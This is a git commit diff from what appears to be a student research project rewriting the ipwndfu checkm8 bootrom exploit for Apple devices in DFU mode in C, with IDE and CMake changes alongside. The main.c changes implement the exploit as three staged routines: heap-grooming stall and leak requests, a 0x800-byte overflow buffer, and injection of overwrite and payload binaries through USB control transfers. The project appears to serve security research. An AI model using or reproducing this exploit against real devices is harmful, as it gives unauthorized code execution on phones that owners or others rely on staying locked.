ohmygod it worked (once)

2019-10-26 18:18:21 -04:00
parent 43ceba8e6f
commit a17fd89015
6 changed files with 111 additions and 70 deletions
--- a/.idea/workspace.xml
+++ b/.idea/workspace.xml
@@ -3,7 +3,6 @@
  <component name="CMakeRunConfigurationManager" shouldGenerate="true" shouldDeleteObsolete="true">
    <generated>
      <config projectName="ipwndfu_rewrite_c" targetName="ipwndfu" />
      <config projectName="ipwndfu_rewrite_c" targetName="libusb-1.0_custom" />
    </generated>
  </component>
  <component name="CMakeSettings">
@@ -12,7 +11,12 @@
    </configurations>
  </component>
  <component name="ChangeListManager">
-    <list default="true" id="b2f61e55-9467-486e-b84a-47b98c1101b5" name="Default Changelist" comment="" />
+    <list default="true" id="b2f61e55-9467-486e-b84a-47b98c1101b5" name="Default Changelist" comment="">
      <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
      <change beforePath="$PROJECT_DIR$/CMakeLists.txt" beforeDir="false" afterPath="$PROJECT_DIR$/CMakeLists.txt" afterDir="false" />
      <change beforePath="$PROJECT_DIR$/libusb_helpers.c" beforeDir="false" afterPath="$PROJECT_DIR$/libusb_helpers.c" afterDir="false" />
      <change beforePath="$PROJECT_DIR$/main.c" beforeDir="false" afterPath="$PROJECT_DIR$/main.c" afterDir="false" />
    </list>
    <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
    <option name="SHOW_DIALOG" value="false" />
    <option name="HIGHLIGHT_CONFLICTS" value="true" />
@@ -22,7 +26,6 @@
  <component name="ClangdSettings">
    <option name="formatViaClangd" value="false" />
  </component>
  <component name="ExecutionTargetManager" SELECTED_TARGET="CMakeBuildProfile:Debug" />
  <component name="Git.Settings">
    <option name="RECENT_GIT_ROOT_PATH" value="$PROJECT_DIR$" />
  </component>
@@ -35,7 +38,7 @@
  <component name="PropertiesComponent">
    <property name="WebServerToolWindowFactoryState" value="false" />
    <property name="last_opened_file_path" value="$PROJECT_DIR$/launch_with_sudo.sh" />
-    <property name="settings.editor.selected.configurable" value="project.propVCSSupport.Mappings" />
+    <property name="settings.editor.selected.configurable" value="settings.github" />
  </component>
  <component name="RunDashboard">
    <option name="ruleStates">
@@ -58,14 +61,8 @@
        <option name="com.jetbrains.cidr.execution.CidrBuildBeforeRunTaskProvider$BuildBeforeRunTask" enabled="true" />
      </method>
    </configuration>
    <configuration name="libusb-1.0_custom" type="CMakeRunConfiguration" factoryName="Application" PASS_PARENT_ENVS_2="true" PROJECT_NAME="ipwndfu_rewrite_c" TARGET_NAME="libusb-1.0_custom" CONFIG_NAME="Debug">
      <method v="2">
        <option name="com.jetbrains.cidr.execution.CidrBuildBeforeRunTaskProvider$BuildBeforeRunTask" enabled="true" />
      </method>
    </configuration>
    <list>
      <item itemvalue="CMake Application.ipwndfu" />
      <item itemvalue="CMake Application.libusb-1.0_custom" />
      <item itemvalue="GDB Remote Debug.ipwndfu_debug_sudo" />
    </list>
  </component>
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -4,16 +4,5 @@ project(ipwndfu_rewrite_c C)
 set(CMAKE_C_STANDARD 99)
 set(CMAKE_C_FLAGS -g)
 add_library(libusb-1.0_custom
        libusb/config.h
        libusb/libusb/core.c libusb/libusb/descriptor.c libusb/libusb/hotplug.c
        libusb/libusb/io.c libusb/libusb/strerror.c libusb/libusb/sync.c
        libusb/libusb/hotplug.h libusb/libusb/libusb.h libusb/libusb/libusbi.h libusb/libusb/version.h
        libusb/libusb/os/linux_netlink.c libusb/libusb/os/linux_usbfs.c libusb/libusb/os/linux_udev.c
        libusb/libusb/os/threads_posix.c libusb/libusb/os/poll_posix.c
        libusb/libusb/os/linux_usbfs.h libusb/libusb/os/threads_posix.h libusb/libusb/os/poll_posix.h)
 add_executable(ipwndfu main.c libusb_helpers.c libusb_helpers.h)
-target_link_libraries(ipwndfu libusb-1.0_custom pthread udev)
+target_link_libraries(ipwndfu usb-1.0)
--- a/bin/overwrite.bin
+++ b/bin/overwrite.bin
--- a/bin/payload.bin
+++ b/bin/payload.bin
--- a/libusb_helpers.c
+++ b/libusb_helpers.c
@@ -20,6 +20,7 @@ void get_test_device(libusb_context *usb_ctx, struct libusb_device_bundle *bundl
        usb_device = usb_device_list[i];
        libusb_get_device_descriptor(usb_device, &usb_desc);
        printf("%i\t%X:%X\n", i, usb_desc.idVendor, usb_desc.idProduct);
        if(usb_desc.idVendor == 0x05AC && usb_desc.idProduct == 0x1227)
        {
            libusb_open(usb_device, &usb_handle);
@@ -45,7 +46,7 @@ void libusb1_async_ctrl_transfer(libusb_device_handle *handle,
    gettimeofday(&start, NULL);
    struct libusb_transfer *usb_transfer = libusb_alloc_transfer(0);
-    libusb_fill_control_setup(usb_transfer_buf, bmRequestType, bRequest, wValue, wIndex, 0xC0);
+    libusb_fill_control_setup(usb_transfer_buf, bmRequestType, bRequest, wValue, wIndex, data_len);
    memcpy(&usb_transfer_buf[8], data, data_len);
    libusb_fill_control_transfer(usb_transfer, handle, usb_transfer_buf, NULL, NULL, 1);
--- a/main.c
+++ b/main.c
@@ -5,60 +5,19 @@
 #include "libusb_helpers.h"
-int main()
+int complete_stage(int stage_function(libusb_device_handle *handle))
 {
    int ret;
    libusb_context *usb_ctx = NULL;
    libusb_init(&usb_ctx);
    struct libusb_device_bundle usb_bundle;
    get_test_device(usb_ctx, &usb_bundle);
    if(usb_bundle.handle == NULL)
    {
        libusb_exit(usb_ctx);
        printf("Could not find device\n");
        return 1;
    }
    struct libusb_device_handle *usb_handle = usb_bundle.handle;
    struct libusb_device_descriptor usb_desc = usb_bundle.descriptor;
    ret = libusb_set_auto_detach_kernel_driver(usb_handle, 1);
    if(ret > 0)
    {
        printf("%s\n", libusb_error_name(ret));
        exit(1);
    }
    unsigned char usb_serial_buf[128];
    unsigned char usb_data_buf[2048];
    unsigned char usb_transfer_buf[2048];
-    libusb_get_string_descriptor_ascii(usb_handle, usb_desc.iSerialNumber, usb_serial_buf, sizeof(usb_serial_buf));
+    libusb_context *usb_ctx = NULL;
-    printf("Found device with serial %s\n", usb_serial_buf);
+    struct libusb_device_bundle usb_bundle;
    struct libusb_device_handle *usb_handle;
    struct libusb_device_descriptor usb_desc;
    // begin the USB magic section
    unsigned int i;
    stall(usb_handle);
    for(i = 0; i < 5; i++)
    {
        no_leak(usb_handle);
    }
    usb_req_leak(usb_handle);
    no_leak(usb_handle);
    libusb_reset_device(usb_handle);
    libusb_close(usb_handle);
    libusb_exit(usb_ctx);
    usb_bundle.handle = NULL;
    // section 2
    libusb_init(&usb_ctx);
    get_test_device(usb_ctx, &usb_bundle);
    if(usb_bundle.handle == NULL)
    {
        libusb_exit(usb_ctx);
@@ -69,5 +28,100 @@ int main()
    usb_handle = usb_bundle.handle;
    usb_desc = usb_bundle.descriptor;
    libusb_get_string_descriptor_ascii(usb_handle, usb_desc.iSerialNumber, usb_serial_buf, sizeof(usb_serial_buf));
    printf("Found device with serial %s\n", usb_serial_buf);
    ret = libusb_set_auto_detach_kernel_driver(usb_handle, 1);
    if(ret > 0)
    {
        printf("%s\n", libusb_error_name(ret));
        return ret;
    }
    ret = stage_function(usb_handle);
    libusb_close(usb_handle);
    libusb_exit(usb_ctx);
    return ret;
 }
 int stage1_function(libusb_device_handle *handle)
 {
    printf("~~~ Stage 1 ~~~\n");
    unsigned int i;
    stall(handle);
    for(i = 0; i < 5; i++)
    {
        no_leak(handle);
    }
    usb_req_leak(handle);
    no_leak(handle);
    libusb_reset_device(handle);
    return 0;
 }
 int stage2_function(libusb_device_handle *handle)
 {
    printf("~~~ Stage 2 ~~~\n");
    unsigned char databuf[0x800];
    memset(databuf, 'A', 0x800);
    libusb1_async_ctrl_transfer(handle, 0x21, 1, 0, 0, databuf, 0x800, 1);
    libusb1_no_error_ctrl_transfer(handle, 0x21, 4, 0, 0, NULL, 0, 0);
    libusb_reset_device(handle);
    return 0;
 }
 int stage3_function(libusb_device_handle *handle)
 {
    printf("~~~ Stage 3 ~~~\n");
    unsigned char overwrite_buf[1524];
    FILE *overwrite_file = fopen("/home/grg/Projects/School/NCSU/iphone_aes_sc/ipwndfu_rewrite_c/bin/overwrite.bin", "r");
    fread(overwrite_buf, 1524, 1, overwrite_file);
    fclose(overwrite_file);
    unsigned char payload_buf[2400];
    FILE *payload_file = fopen("/home/grg/Projects/School/NCSU/iphone_aes_sc/ipwndfu_rewrite_c/bin/payload.bin", "r");
    fread(payload_buf, 2400, 1, payload_file);
    fclose(payload_file);
    usb_req_stall(handle);
    usb_req_leak(handle);
    libusb1_no_error_ctrl_transfer(handle, 0, 0, 0, 0, overwrite_buf, 1524, 100);
    libusb1_no_error_ctrl_transfer(handle, 0x21, 1, 0, 0, payload_buf, 2048, 100);
    libusb1_no_error_ctrl_transfer(handle, 0x21, 1, 0, 0, &payload_buf[2048], 352, 100);
    libusb_reset_device(handle);
    return 0;
 }
 int check_function(libusb_device_handle *handle)
 {
    return 0;
 }
 int main()
 {
    int ret = complete_stage(stage1_function);
    if(ret == 0)
    {
        ret = complete_stage(stage2_function);
    }
    usleep(2000);
    if(ret == 0)
    {
        ret = complete_stage(stage3_function);
    }
    complete_stage(check_function);
    return ret;
 }